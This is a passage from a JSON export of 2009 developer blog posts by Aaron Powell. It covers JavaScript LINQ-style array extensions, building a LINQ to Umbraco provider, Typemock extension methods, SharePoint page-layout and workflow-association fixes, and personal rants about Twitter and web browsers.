If I get some time I’ll modify it to check interfaces instead :P\n", "id": "2009-05-05-creating-jquery-plugins-from-ms-ajax-components" }, { "title": "Viralising via twitter", "url": "https://www.aaron-powell.com/posts/2009-04-26-viralising-via-twitter/", "date": "Sun, 26 Apr 2009 21:33:16 +0000", "tags": [ "Random Junk" ], "description": "", "content": "Yet another one of my posts about how I just don't get Twitter, this time it's about the way which sites can go viral via Twitter, and how quickly they spread.\nA while ago a site started going around, called WeFollow, which is just a user directory. You can put yourself up on their directory, listing a few hashtags which you are primarily posting under.\nI listed myself on there, and watch as the people I follow also listing themselves on there as well.\nNo big deal, it was kind of cool, maybe I'd pickup a follower or two, or find some people who are useful to follow.\nNot long later some people started tweeting about Fast140, a typing speed test. It starts with one person, but very quickly everyone is on there. And the virus is out and spreading around.\nThe latest site to go viral across the people I follow was Twibes. Twibes is basically the same as WebFollow, but slightly better ogranised.\nLike real life viruses in a small group of people they spread quickly. But what makes this really interesting to observe is that I follow two distinct (and very separate) groups on Twitter, Umbraco developers and SharePoint developers. They don't really overlap in their areas (except for a few exceptions such as myself), and this is where viralising via Twitter is interesting to watch.\nTwibes started in the SharePoint group, first there was the odd few people and then quickly one of the big SharePoint resources does it and bam, everyone starts doing it.\nAnd then interestingly, a few hours later (because of time-zone differences I'd say) it starts with Umbraco. And the same format happens, it starts slowly, then gets picked up by the bigger guys and then the wildfire is out of control.\nI got sucked in with WeFollow and Fast140 but I'm starting to wise up to viralising via Twitter. There's a lot of money which can be made with online advertising if you get enough people to check your stuff out. The way viral marketing can spread around the internet these days, thanks to the explosion of social networking sites, it's becoming easier to get the word out. \nBut people need to be wary. All it takes is one nasty person to realise the power of virualsing via twitter to exploit it.\nSo if you're interested in watching how quickly a virus can spread, join Twitter and await the next big crazy to hit. \n", "id": "2009-04-26-viralising-via-twitter" }, { "title": "Blog update, now with more syntax highlighting", "url": "https://www.aaron-powell.com/posts/2009-04-23-blog-update-now-with-more-syntax-highlighting/", "date": "Thu, 23 Apr 2009 09:06:37 +0000", "tags": [], "description": "", "content": "I finally go around putting a proper syntax highlights on my blog, to fix up that I was previously hand-doing the UI for any code that I was putting into my blog.\nI've gone with the JavaScript tool Syntax Highlighter. 
It's really neat and very simple to add into a site and use.\nI've chosen the dark theme, to keep it closer to my actual Visual Studio theme (see this post as to why I use a black VS theme).\n<script type=\"text/javascript\"> alert(\"Hey, JavaScript highlighting!\"); </script> public void Alert() { Console.WriteLine(\"And C# as well!\"); } The next thought is that I really should look into Windows LiveWriter to make posting even easier.\n", "id": "2009-04-23-blog-update-now-with-more-syntax-highlighting" }, { "title": "LINQ in JavaScript", "url": "https://www.aaron-powell.com/posts/2009-04-20-linq-in-javascript/", "date": "Mon, 20 Apr 2009 12:40:03 +0000", "tags": [ "LINQ", "AJAX", "JavaScript" ], "description": "", "content": "Let me start by saying that I am aware that there is a LINQ to JavaScript project on Codeplex but this was done by me are more of an achidemic exercise/ challange.\nSo while I've been working on LINQ to Umbraco I've also been spending some time doing AJAX-y stuff, and I have been having a lot of fun playing with JavaScript.\nAnd then one day I was thinking about how I would go about manipulating a collection entirely client-side, and realised that loops are ultimately the only way to go about it. Well that's all well and good, but if you want to do a lot of collection manipulation there's not a really good way to go about it (or at least, a really good way from a .NET developer point of view :P).\nAnd after all, what is LINQ? LINQ really just is a way in which you can do pesudo-dynamic programming in a static language (as Lambda is heavily derived from dynamic languages). So shouldn't it be possible to do in a dynamic language?\nSo I whipped out my copy of Visual Studio and got coding away, and here's an end-line of code entirely in JavaScript:\narray.where(function(item) { return item.property === \"something\"; }).orderBy().groupBy(function(item) { return item.value; });  Lovely isn't it.\nBut before I get into some of the stuff I do, let me explain why my approach is different to the JSLINQ project on Codeplex.\nNow I mean no disrespect to Chris, but there are a few things which I don't like about his approach, and which kind of go against the LINQ pattern.\nFirst off JSLINQ requires that you create a new object which you pass the array into. I can see some reasons for this, better intellisense, more strict control over collection manipulation (the collection becomes read-only) but I think that the primary reason must be to better support object-notation arrays (you know, [] arrays). When you define an array using object notation it's not really an array (typeof [] === \"object\"). This is a problem if you want to LINQify it, you need to pass it to some other type.\nThe second issue I have with it is the naming. All the methods are named with Pascal Casing, which is the standard in .NET land, but every JavaScript library I've ever used (and as is standard) uses Camel Casing for methods. Sure Pascal keeps its relationship to .NET valid, but when trying to appeal the JavaScript developers it's just a bit foreign.\nLastly I'm a bit bothered by the lack of argument checking. This may be because I'm a very defensive programmer, but I don't like to allow developers to shoot themselves in the foot. If a parameter should be a function, then the paramter should be checked as a function. 
If a parameter is required, it should be checked as such.\nThis is more of a personal preference than a real design flaw though.\nMy approach\nNow that I've talked aobut what I don't like with the JSLINQ project I think it's only fair to talk about my approach. I've gone with a more traditional LINQ approach and added extensions to an existing type, in this case the Array type, via Array.prototype. This means it is closer to the extension-method format of IEnumerable<T> from .NET, you just need to add in a namespace (aka, include the JavaScript file), but does have a problem of allowing the collection to be modified (which does have pros and cons).\nI have also kept with standard JavaScript programming and Camel Cased the method names.\nThe following operators are supported:\nWhere Order By (inc decending) First/orDefault Single/orDefault Last/orDefault Select GroupBy IndexOf By and large the word under the hood with for loops, taking a method (aka a Lambda function) and using it.\nAs I said I'm a defensive programmer so there is a lot of type-checking against the arguments and the return types of methods (for example, ensuring the the Where lambda returns a boolean).\nGroupBy is my most proud operator, as it turned out to be a bit harder than I had though. But it does return a collection which is also a pesudo-dictionary which can be itterated through.\nI would provide the full source code but there seems to be a problem with current Umbraco instance running my blog which wont let me upload media items!\nBut here's the Where and GroupBy operators:\nArray.prototype.where = function(fn) { /// Filters the array /// Filtering function /// if (typeof (fn) !== typeof (Function)) throw Error.argumentType(\"fn\", typeof (fn), typeof (Function), \"where takes a function to filter on\"); var coll = new Array(); for (var i = 0; i < this.length; i++) { var ret = fn(this[i]); if (typeof (ret) !== \"boolean\") throw Error.argumentType(\"fn\", typeof (ret), typeof (Boolean), \"function provided to where much return bool\"); else if (ret) coll.push(this[i]); } return coll; } Array.prototype.groupBy = function(fn) { /// if (!fn || typeof (fn) !== typeof (Function)) { throw Error.argumentType(\"fn\", typeof (fn), typeof (Function), \"groupBy takes a function to filter on\"); } var ret = new Array(); for (var i = 0; i < this.length; i++) { var key = fn(this[i]); var keyNode = ret.singleOrDefault(function(item) { return item.key === key; }); if (!keyNode) { ret[ret.length] = { "key": key, "items": new Array() }; ret[ret.length - 1].items.push(this[i]); } else { ret[ret.indexOf(keyNode)].items.push(this[i]); } } return ret; }  \n", "id": "2009-04-20-linq-in-javascript" }, { "title": "SharePoint feature corrupts page layout", "url": "https://www.aaron-powell.com/posts/2009-03-24-sharepoint-feature-corrupts-page-layout/", "date": "Tue, 24 Mar 2009 19:39:28 +0000", "tags": [ "SharePoint" ], "description": "", "content": "Something that I've come across a few times when working on SharePoint/ MOSS 2007 features. When importing a Page Layout the ASPX some times becomes corrupt. You end up with additional HTML inserts once it's been imported into SharePoint.\nThe corruption is in the form of HTML tags, outside the last </asp:Content> tag.\nWell it turns out that the problem is caused when you import an ASPX that has a </asp:content> tag it'll happen.\nDid you notice the problem?\nThat's right, if you have a lowercase c then it'll import corrupt. 
Let me show the problem again, highlighted this time:\n</asp:content>\nAll you need to do is ensure that that has a capital letter, so the tag is </asp:Content> and it's all good again.\nThe most common cause of this happening is doing a format-document within Visual Studio on the ASPX when it is in the features class-library project. Visual Studio doesn't handle the ASPX file correctly, and formats it as a raw XHTML file, which dictates that the XHTML tags need to be in all lowercase.\nThe things you discover... \n", "id": "2009-03-24-sharepoint-feature-corrupts-page-layout" }, { "title": "Building a LINQ provider - Step 0", "url": "https://www.aaron-powell.com/posts/2009-03-23-building-a-linq-provider---step-0/", "date": "Mon, 23 Mar 2009 08:48:02 +0000", "tags": [ "LINQ" ], "description": "", "content": "Since I've started writing LINQ to Umbraco I have been doing a lot of investigation into the way that LINQ works and how to go about building your own custom LINQ provider. One thing I've noticed is there is a distinct lack of information on the web in about how to do this. Matt Warren has a really good series on building a LINQ provider, but it's still related to SQL translations. Bart De Smet is also a really great blogger who has done quite a bit on LINQ, it's kind of the LINQ guy. He's written the LINQ to SharePoint tool, LINQ to Active Driectory, LINQ to MSI, LINQ through PowerShell, and the list goes on. I really suggest you have a read through his posts. I'll be doing a lot of referencing to his posts throughout this series.\nFirst off, a bit of a disclaimer. This series is a work in progress, I'll quite probably go back on what I say during the series as I'm still really learning what I'm trying to achieve. Everything I post here is stuff that I have learn by reading blog posts (and I'll link where applicable), reflecting LINQ to SQL and reading source code of open source projects such as LINQ to ShaerPoint. This series is as much for myself as it is for anyone else. There a lot of stuff you need to know when it comes to building a query provider and trying to keep it all in my brain is really starting to hurt :P. I've already looked at sections of my code and had to think long and hard about what they do. I've also had a lot of code already refactored several times!\nSo lets get started!\nGetting started - What provider model? I'm making the assumption that you're chosen what you're going to provide a LINQ support for, now the question is how do you go about providing the LINQ support. There are two model of how to go about providing LINQ support, via IQueryable<T> or via method chaining. Method chaining? What's that you say? As I pointed out in my post A LINQ Observation LINQ query syntax is really just syntactical suger; all statments ultimate compile down to chained method calls. This means that you can quiet easily provide a LINQ provider without implementing IQueryable<T>. In fact, have a look in Reflector, there's actually not much which it implements. All the Where, Select, Join, etc statements reside within the the class System.Linq.Queryable (in System.Core) as extension methods! That means, if you provide a method with the construct:\npublic IEnumerable<TResult> Select<T, TResult>(Func<T, TResult> selector) { ... } You can quite easily write your own LINQ provider. 
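As a quick illustration (my own made-up types, not from LINQ to Umbraco), the compiler will happily bind query syntax to plain instance methods, no IQueryable<T> required:
using System;
using System.Collections.Generic;

public class Doc { public int Id; public string Alias; }

public class DocSource
{
    private readonly List<Doc> _docs;

    public DocSource() : this(new List<Doc> { new Doc { Id = 1, Alias = "home" }, new Doc { Id = 2, Alias = "about" } }) { }

    private DocSource(List<Doc> docs) { _docs = docs; }

    // Query syntax compiles down to calls on whatever Where/Select it can find,
    // so these two methods are all that's needed for 'from ... where ... select ...'.
    public DocSource Where(Func<Doc, bool> predicate)
    {
        return new DocSource(_docs.FindAll(d => predicate(d)));
    }

    public IEnumerable<TResult> Select<TResult>(Func<Doc, TResult> selector)
    {
        foreach (var d in _docs) yield return selector(d);
    }
}

class Demo
{
    static void Main()
    {
        var docs = new DocSource();
        // Compiles to docs.Where(d => d.Id == 1).Select(d => d.Alias);
        // anything you haven't provided (Join, GroupBy, etc) simply won't compile.
        var aliases = from d in docs where d.Id == 1 select d.Alias;
        foreach (var alias in aliases) Console.WriteLine(alias); // prints "home"
    }
}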
I could go on about this, but it's best covered by Bart De Smet in his post Q: Is IQueryable the Right Choice for Me?, The Most Funny Interface of the Year … IQueryable<T>, and then an example of how to achieve this is through his LINQ to MSI series (starting here). The primary advantage of using method chaining over the top of IQueryable is that it allows you to have compile time checking of LINQ expressions. This is a very powerful concept if you don't have a data provider which is capable of supporting everything which LINQ has within it. LINQ to MSI is a great example. As Bart points out the MSI query language is very SQL-like, but it doesn't support all the operations. By implementing LINQ via the method chaining manner rather than via a full IQueryable interface when compiling a user will know what operations are and aren't available. Don't take my word for it, have a read through the series. It's very interesting and it really opens your eyes to what LINQ is and how it is really implemented.\nFor LINQ to Umbraco I chose to use the IQueryable model. The reason for this is that LINQ to Umbraco (in its current implementationhint hint) is going to be querying against the Umbraco XML file. This means it is actually built on top of LINQ to XML. Since LINQ to XML already supports all the standard LINQ operations I don't see any point in restricting what the developer has within his toolkit. It is true that I'm not likely to ship all the operations (there's a hell of a lot to cover off!), but the framework will be there for all the standard operations to be supports. This does mean that until runtime there wont be any checking of the syntax so you're likely to have a NotImplementedException thrown, but hopefully the documentation will outline what is and isn't available *cough*.\nWell hopeful this has given a starting point and some background reading for building a LINQ provider and given you some thinking about what to do before jumping straight into coding. The most important part of a LIQN provider is thinking it through from the outset!\n", "id": "2009-03-23-building-a-linq-provider---step-0" }, { "title": "LINQ to Umbraco update", "url": "https://www.aaron-powell.com/posts/2009-03-20-linq-to-umbraco-update/", "date": "Fri, 20 Mar 2009 15:14:27 +0000", "tags": [ "LINQ", "Umbraco", "LINQ to Umbraco" ], "description": "", "content": "As I mentioned in a previous post I'm working on a LINQ provider for Umbraco, a proper one, not one which is exploiting the operations on LINQ to Objects.\nWell I thought I'd do an update on the progress that'd been made thus far on it. This comes on the back of yesterdays post where I eluded to something exciting.\nI've completed the main codebase for the DocType Markup Language (DTML) generator last week. Currently it's stuck as a console application which you run, I'm going to be working on the Visual Studio tool, so it can generate like LINQ to SQL does with the DBML. That's proving to be a bit more of a problem than I had hoped, so it's popped on the backburner for the moment. Visual Studio integration is a \"nice to have\", not a \"must have\".\nThe DTML generator, as mentioned, is a console application which runs directly against the Umbraco database. It generates an XML file which represents the DocTypes in your site. This can then be used to generate .NET code in the form of C# of VB.NET (depending on your preferences). Documentation on how to run it will be provided in the future, but there is a help switch for the mean time! 
:P\nBut why generate an XML file and a .NET file? Well other than desire to have it work from Visual Studio it provides a different feature. The XSD for the DTML file is available within the LINQ to Umbraco source (and it's 85% of the exported DocType XML), and if you spend the time having a read of it you should be able to work out how to hand-code one of them.\nThis means that you'll be able to have your classes generated, code written and unit tested, without even having to install Umbraco. This means devs can get started while the UI/ front end guys are putting the site together.\nBut now for the exciting news, in the last week I've turned my attention to the most important section of the project, the LINQ provider. And in todays commit to Codeplex I added 6 new (passing) tests for LINQ select statements!\n*holds for applause*\nThat's right, there is support for LINQ select statments in both Lambda and Query format. The following works:\nSelect returning type of collection (ctx.CwsHomes) Select returning single property (ctx.CwsHomes.Select(h => h.Bodytext)) Select returning annonymous (ctx.CwsHomes.Select(h => new { h.Bodytext, h.CreateDate} )) True that it's not super useful, there's no filtering yet, but what is done is a good start (and a whole lot sooner than I expected to get it working :P).\nI'm not going to provide a package to download, you can get the full source code from the Umbraco project on Codeplex (under the 4.1 branch).\n", "id": "2009-03-20-linq-to-umbraco-update" }, { "title": "A LINQ observation", "url": "https://www.aaron-powell.com/posts/2009-03-19-a-linq-observation/", "date": "Thu, 19 Mar 2009 12:44:44 +0000", "tags": [ "LINQ", "LINQ to SQL", "Umbraco", "LINQ to Umbraco" ], "description": "", "content": "Well I'm making good headway with LINQ to Umbraco, in the next few days I'll be doing a very interesting check in (which I'll also blog here about). My tweet-peeps already have an idea of what it entails, but there's a bit of a problem with it still which I want to address before the commit.\nAnd that problem has lead to an observation I made about LINQ, well, about Expression-based LINQ (ie - something implementing IQueryable, so LINQ to SQL, or LINQ to Umbraco, etc).\nI'll use LINQ to SQL for the examples as it's more accessible to everyone.\nTake this LINQ statement (where ctx is an instance of my DataContext):\nvar items = ctx.Items;\nThat statement returns an object of Table<Item>, which implements IQueryable<T>, IEnumerable<T> (and a bunch of others that are not important for this instructional). So it's not executed yet, no DB query has occured, etc. Now lets take this LINQ statement:\nvar items2 = from item in ctx.Items select item;\nThis time I get a result of IQueryable<Item>, which implements IQueryable<T> (duh!) and IEnumerable<T> (and again, a bunch of others).\nBoth of these results have a non-public property called Expression. This reperesents the expression tree which is being used to produce our collection. But here's the interesting part, they are not the same. That's right, although you're getting back basically the same result, the expression used to produce that result is really quite different.\nThis is due to the way the compiler translates the query syntax of LINQ into a lambda syntax. In reality the 2nd example is equal to this:\nvar items2 = ctx.Items.Select(item => item);\n \nBut is this really a problem, what difference does it make? In the original examples you actually get back the same data every time. 
You'll have slightly less overhead by using the access of Table<T> rather than IQueryable<T>, due to the fact that you're not doing a redundant call to Select. But in reality you would not notice the call.\nThis has caused a problem for me as my direct-access lambda syntax fails my current unit test, where as the query syntax passes. Now to solve that problem! ;)\n", "id": "2009-03-19-a-linq-observation" }, { "title": "I still don't get Twitter", "url": "https://www.aaron-powell.com/posts/2009-03-10-i-still-dont-get-twitter/", "date": "Tue, 10 Mar 2009 19:23:57 +0000", "tags": [ "Random Junk" ], "description": "", "content": "So Karl posted today (well, tomorrow at 2.29am or something, yeah my blog isn't the only one who's dates are freaky!) asking what value Twitter adds.\nAs I recently posted I have a twitter account and I don't really get the point either.\nBut I must confess, I'm getting more into it, well, into it but still not getting its point.\nOriginally when I got onto as I was trying to get a hold of Niels, he was away from his email at the time and I knew he was still checking that :P\nNow I do use it a bit more, mainly I use it still to follow Umbraco stuff, but I also follow some others. I started following Elijah Manor who seems to do nothing but find other interesting blogs on the topic of AJAX, jQuery, etc. I've had a lot of interesting stuff come across his feed.\nI also started following Paul Stovell since his blog went down and he's tool lazybusy to fix it.\nI definately don't get the point of if for the I'm Pooping tweets :P\n \nInteresting side-note, my 4th largest source of traffic to my blog is Twitter!\n", "id": "2009-03-10-i-still-don't-get-twitter" }, { "title": "A nifty Typemock extension on steroids", "url": "https://www.aaron-powell.com/posts/2009-03-06-a-nifty-typemock-extension-on-steroids/", "date": "Fri, 06 Mar 2009 13:04:47 +0000", "tags": [ "Unit Testing", "Typemock" ], "description": "", "content": "So in my last post I showed a nifty Typemock extension for doing repetition within Typemock's AAA syntax on the WhenCalled method. When I wrote that extension it was only done in a rush and it had 1 flaw, you couldn't do method chaining to do the n+1 action, you had to do it on a separate line.\nWell I spent another 5 minutes on it and added this feature (plus a repeat on CallOriginal). 
Here's the updated extension set:\npublic static class Extensions { public static ActionRepeater<TReturn> WillReturnRepeat<TReturn>(this IPublicNonVoidMethodHandler<TReturn> ret, TReturn value, int numberOfReturns) { for (var i = 0; i < numberOfReturns; i++) ret.WillReturn(value); return new ActionRepeater<TReturn>(ret); } public static ActionRepeater<TReturn> CallOriginalRepeat<TReturn>(this IPublicNonVoidMethodHandler<TReturn> ret, int numberOfReturns) { for (var i = 0; i < numberOfReturns; i++) ret.CallOriginal(); return new ActionRepeater<TReturn>(ret); } } public class ActionRepeater<TReturn> { private IPublicNonVoidMethodHandler<TReturn> _actionRepeater; public ActionRepeater(IPublicNonVoidMethodHandler<TReturn> actionRepeater) { _actionRepeater = actionRepeater; } public IPublicNonVoidMethodHandler<TReturn> AndThen() { return _actionRepeater; } }\nI'll admit that I have made it a touch verbose to use, but I think it's better to convey what is happening to other people reading the tests (it's a lot like Rhino Mocks in verboseness I guess). So to use it now all you need to do is:\nIsolate.WhenCalled(() => someMock.SomeMethod()).WillReturnRepeat(true, 3).AndThen().CallOriginal(); //or, chained repeats! Isolate.WhenCalled(() => someMock.SomeOtherMethod()).WillReturnRepeat(\"Hello World\", 2).AndThen().WillReturnRepeat(\"Good-bye World\", 2).AndThen().CallOriginal(); Makes for some really crazy mocks ;)\n \nPS: You can use the Repeat extensions with a repeat count of 1 if you just want the method chaining too:\nIsolate.WhenCalled(() => someMock.SomeMethod()).WillReturnRepeat(true, 1).AndThen().CallOriginalRepeat(1).AndThen().ReturnRecursiveFakes();", "id": "2009-03-06-a-nifty-typemock-extension-on-steroids" }, { "title": "A nifty Typemock extension", "url": "https://www.aaron-powell.com/posts/2009-03-03-a-nifty-typemock-extension/", "date": "Tue, 03 Mar 2009 22:49:47 +0000", "tags": [ "Unit Testing", "Typemock" ], "description": "", "content": "Using AAA with Typemock there's a bit of a problem if you want to repeat the returned value a number of times before then doing something different. It's very useful if you are accessing a mocked object within a loop and want to know the number of loop executions.\nSo I've put together a simple little Typemock extension (but I'm sure it'd be adaptable for any mock framework supporting AAA):\npublic static void WillReturnRepeat<TReturn>(this IPublicNonVoidMethodHandler ret, TReturn value, int numberOfReturns) { for (var i = 0; i < numberOfReturns; i++) ret.WillReturn(value); } You then just use it like this:\nIsolate.WhenCalled(() => mockObject.SomeMethod()).WillReturnRepeat(true, 3); Isolate.WhenCalled(() => mockObject.SomeMethod()).CallOriginal(); So the mock will return true 3 times and then it will do the original call (for the purpose of this demo we'll assume it would return false).\nAnyone else got some nifty Typemock extensions?  
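To round it out with the loop scenario that prompted this, here's a hedged sketch of a test; IFeedReader and FeedCounter are made-up types, and I'm assuming Typemock's Isolate.Fake.Instance<T>() plus NUnit-style asserts:
public interface IFeedReader { bool MoveNext(); }

public class FeedCounter
{
    public int Count(IFeedReader reader)
    {
        var count = 0;
        while (reader.MoveNext()) count++;
        return count;
    }
}

[Test]
public void Count_stops_when_the_reader_is_exhausted()
{
    var fakeReader = Isolate.Fake.Instance<IFeedReader>(); // assumed Typemock AAA call

    // true for the first three calls, then false from the fourth call on
    Isolate.WhenCalled(() => fakeReader.MoveNext()).WillReturnRepeat(true, 3);
    Isolate.WhenCalled(() => fakeReader.MoveNext()).WillReturn(false);

    var count = new FeedCounter().Count(fakeReader);

    Assert.AreEqual(3, count);
}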
\n", "id": "2009-03-03-a-nifty-typemock-extension" }, { "title": "An observation on browsers", "url": "https://www.aaron-powell.com/posts/2009-03-01-an-observation-on-browsers/", "date": "Sun, 01 Mar 2009 17:09:38 +0000", "tags": [ "Random Junk" ], "description": "", "content": "I've been a big fan of the Opera web browser for a number of years, I've used it since it's v4 days. I remember it being an ad-supported browser and I remember when it became free (that was a great day!). I remember it being a very innovative browser (and it still is) with this such as:\nTabbed browsing Mouse gestures Speed Dial Session Management It's served me well for a long time, on every platform from Windows to Linux to Mac OS X, and even mobile devices.\nBut this weekend things haven't been so good, Opera started crashing on me, constantly, even when the browser was in the background in an idle state.\nSo I've reverted back to using Safari. I could use Firefox, but I've never been a fan of Firefox as a daily browser. I find it a great web dev tool thanks to the plugin engine, but it's always felt cumbersome as a daily browser. It is heavy and slow to start up, and it's never had a good feel to it as a daily browser.\nBut Safari is starting to shit me. Since that Safari 4.0 beta came out this week I thought it'd be an idea to have a crack at it, see how it goes. Well I can tell you, it's currently not going.\nFirst off, I had to install a security patch before I could install the browser. Ok, fine, I hadn't been keeping up-to-date with the paths, but c'mon, it's a single patch which had only just been released!\nSo I installed the patch, which required a reboot, and then re-ran the Safari 4 installer.\nAnd that didn't exactly go well, to install Safari 4 on a latest-patched OS X 10.5 install you need 107Mb of hard drive space! WTF?! It's just a browser! People blame Microsoft software for being bloated, but I'm pretty sure that the IE 8 beta isn't that big!\nThe next hurdle is that it requires me to reboot to install. Again, WTF?! IT'S JUST A BROWSER!\nThis is something that's really starting to piss me off about OS X, it's worse than Vista when it comes to reboot-on-install, and worse off is that you have to be rebooting for the install to take place. Unlike Vista which you can install and it'll finish the install during the reboot OS X requires you to do the complete reboot while installing.\nBUT WHY DO I NEED TO REBOOT FOR A BROWSER!? (I've got another gripe about having to reboot to install the new version of Quicktime, why the fuck do I have to reboot to install a media player, but that's a rant for another day)\nSo I'm sticking with Safari 3 for now, and I'm starting to realise just how limiting it is as a browser, compared to the others of its generation.\nLets first compare it with IE 7, the Microsoft browser of the same generation. By-and-by they are as good as each other. But there's one glaring feature that Safari lacks compared to IE is session management. It's a common feature across current generation browsers, remembering what you were doing when you exited so when you next pick it up you are where you were previously.\nBut I can't for the life of me work out where I can turn it on.\nAnother feature I can't seem to work out is how to have images shown at the full size, not scaling it to the window by default. It's a simple to turn off in IE, but so far it's eluding me in Safari.\nLastly I'm finding that Safari always wants to download files where it wants, I never get asked. 
Again, a feature of all current browsers, except Safari.\n \nOverall what I've noticed with Safari and IE alike, is that OS-related browsers are well behind the curve. With a release cycle like Opera and Firefox not being tied to that of an OS they can push them out a lot faster, leaving the others behind.\nSafari is an Ok browser, like IE is an Ok browser. But I wish I could get Opera back, and I wish that Umbraco would work from it :P \n", "id": "2009-03-01-an-observation-on-browsers" }, { "title": "Typemock AAA - Faking the same method with different parameters", "url": "https://www.aaron-powell.com/posts/2009-02-25-typemock-aaa---faking-the-same-method-with-different-parameters/", "date": "Wed, 25 Feb 2009 20:36:49 +0000", "tags": [ "Unit Testing", "Umbraco", "Typemock" ], "description": "", "content": "As I stated in my last post (oh so 5 minutes ago! :P) I'm working on a new project for the Umbraco team, one thing I'm really focusing hard on with LINQ to Umbraco is Test Driven Development (TDD), and with that I'm using Typemock as my mocking framework (since I scored a free license I thought I should use it).\nThe Arrange, Act, Assert (AAA) is really sweet, but it does have a problem, it doesn't support mocking a method call with different parameters. I can't call the same method 3 times and have a different output depending on what was passed in.\nMakes for a bit of a problem when you want to test conditionals against your mock. I have requested the feature, but for the time being I found a nice little work-around, Extension Methods!\nSo I'm mocking the IRecordsReader from the Umbraco DataLayer, and I want to have something different returned depending on the parameter of the GetString method, so I created extensions like this:\npublic static string GetName(this IRecordsReader reader){\nreturn reader.GetString(\"Name\");\n}\nNow I can easily do this:\nIsolate.WhenCalled(() => fakeReader.GetName()).WillReturn(\"Name\");\nIsolate.WhenCalled(() => fakeReader.GetString(\"SomethingElse\")).WillReturn(\"Not Name\");\n// do something with fakeReader\nIsolate.Verify.WasCalledWithExactArguments(() => fakeReader.GetName());\nIsolate.Verify.WasCalledWithExactArguments(() => fakeReader.GetString(\"SomethingElse\"));\nThis obviously isn't the best way to do it, does mean that you have to then use extension methods when you are writing the code to use it.\nBut that's not really a problem for me at the moment, I'm doing a lot of the same data reading from the IRecordsReader so I can easily do the extension method.\nNow if they will just add the support like Rhino Mocks has then it'll be sweet!\n", "id": "2009-02-25-typemock-aaa---faking-the-same-method-with-different-parameters" }, { "title": "UIL v1.1 release, and some sadness", "url": "https://www.aaron-powell.com/posts/2009-02-25-uil-v11-release-and-some-sadness/", "date": "Wed, 25 Feb 2009 20:14:20 +0000", "tags": [ "Umbraco", "Umbraco.InteractionLayer" ], "description": "", "content": "Well today I have produced the latest version of the UIL, v1.1, which can be downloaded here: http://www.codeplex.com/UIL/Release/ProjectReleases.aspx?ReleaseId=23765. This version addresses a problem found with the IsDirty state when opening existing documents.\nDuring a development implementation of it there it was noticed that when you opened existing documents the IsDirty always returned true.\nThis is now fixed, and I also addressed another problem which was realised. It was actually a design limitation, not a bug (per-say). 
I had the UIL relying on the ID's of the DocTypes at time of generation, this posed a problem when using the UIL on existing websites. When you tried to deploy the DocTypes into a new environment using Umbraco Packaging (or manually creating them), a new ID would be generated! This posed a big problem. Instead I have change it so the UIL relies on the alias at time of generation, which isn't 100% unique, but it's unique enough ;).\n \nBut there is also a bit of sadness in this post, as this post signals the final installment of UIL being under active development (although I use the term active loosely :P). I will no longer be actively adding features to the UIL, unfortunately I no longer have the time to dedicate to the project and implement the features which I had intended to implement. I will try and implement fixes for any bugs which people find, but really I don't have enough time to work on anything new for the UIL.\nBut it's not all sad, there is a good reason which I no longer have the time to dedicate to the UIL, it is because I have taken on a bigger project. After speaking with Niels and the other guys who make up the Umbraco project I've been asked to develop a proper LINQ to Umbraco implementation. That's right, I'm currently working to produce what the UIL was originally going to become, a LINQ provider for Umbraco.\nI'm going to keep some of the details secret, but I'll just say that at the moment the UIL isn't going to be completely replaced by LINQ to Umbraco, rather it's going to be suplimented by it. Where UIL is all about how to interact with Documents and Document creation LINQ to Umbraco is going to be all about interacting with published nodes and the Umbraco node cache.\nSo be on the lookout for some really interesting posts in the coming weeks/ months in which I'll provide more details on LINQ to Umbraco, or feel free to watch the progress of the of the code on Codeplex..\nSo sad times, with happy times.\n", "id": "2009-02-25-uil-v11-release-and-some-sadness" }, { "title": "Programmatically modifying SharePoint workflows", "url": "https://www.aaron-powell.com/posts/2009-02-22-programmatically-modifying-sharepoint-workflows/", "date": "Sun, 22 Feb 2009 00:00:00 +0000", "tags": [ "sharepoint", "rant" ], "description": "", "content": "First off, let me start by saying that I often really hate SharePoint. Well maybe I should be a bit more specific, I really hate Publsihing Portals in Microsoft Office SharePoint Server 2007.\nWindows SharePoint Services 3.0 I think is a great product, and the MOSS extensions are really quite awesome (Excel Services, enterprise search, etc), but Publishing Portals are shit.\nOk, I better stop or I'm going to keep ranting and not do this post.\nI'm building a MOSS publishing site at the moment, and the client wants a multiple stage workflow. Luckily I found a really great blog post on how to do that with the standard MOSS approver workflow (link), but there's a problem, this only modifies the workflow on the current Publishing Site, any time a new one is created the change has to be done again.\nNow I really didn't want to have to have the client constantly doing this, I kept thinking there has to be a better way. So I did what any good SharePoint developer does, pulled out my copy of Reflector and started digging through the workflow code.\nThen I got sad, the workflow is an InfoPath form it seemed, or at least I have no really easy way to edit it. 
It doesn't seem like there is a way I can do anything to the workflow itself, because the workflow doesn't really maintain the data I need. Then I found the SPWorkflowAssociation class, which is what maintains the relationship between the selected workflow template (see SPWorkflowTemplate) and the SPList (in my case, the Pages list of the Publishing Portal).\nSo now I'm really boned: there doesn't seem to be anything within the API I can use to set the workflow approver accounts, so my other option is to create a new Site Definition.\nShit.\nSite Definitions are scary, really bloody scary. I've read the theory on how to do them but never attempted it, and I'm not sure it's something I want to try and learn on-project!\nShit.\nSo while staring at the API I had an epiphany: SPWorkflowAssociation has a property called AssociationData. I did a dump with LINQPad to work out what it contained and wow, this is exactly what I wanted. It may be in XML format but I can deal with that. Any SharePoint developer is used to working with XML which has next to no documentation (CAML is painfully undocumented, and then there's Solutions, Features, Site Definitions, etc!) so I can deal with this.\nWell there's an easy way to get my XML: just create it as needed and then set it as a string back on a new instance.\nAnd then the next problem came up, there's no Update method on SPWorkflowAssociation! Damnit! But you wouldn't believe how happy I was to find SPList.UpdateWorkflowAssociation(SPWorkflowAssociation), oh yeah, WIN!\nThen I end up with this bit of code:\nusing(SPSite site = new SPSite(\"http://localhost\")) {\nusing(SPWeb web = site.OpenWeb()){\nPublishingWeb pubWeb = PublishingWeb.GetPublishingWeb(web);\nSPWorkflowAssociation wfa = pubWeb.PagesList.GetWorkflowAssociationByName(\"Parallel Approval\");\nwfa.AssociationData = @\"...\"; // omitted\npubWeb.PagesList.UpdateWorkflowAssociation(wfa);\npubWeb.PagesList.Update();\npubWeb.Update();\nweb.Update();\n}\n}\nI've not included the XML as it's a bit large, but it's not exactly required.\nThe next question is how do you deploy this? You need a way that it can be done for each new site created, but as far as I'm aware there isn't any way I can tie into the site creation.\nSo to get around this I've come up with an idea I'm quite happy with: a SharePoint Feature, scoped at the Web level.\nThen all that's needed is to manually activate the feature whenever a new site is created. This makes it nice and easy to have a deployable WorkflowAssociation. You could (kind of) use the above code to deploy a new Workflow Association, if 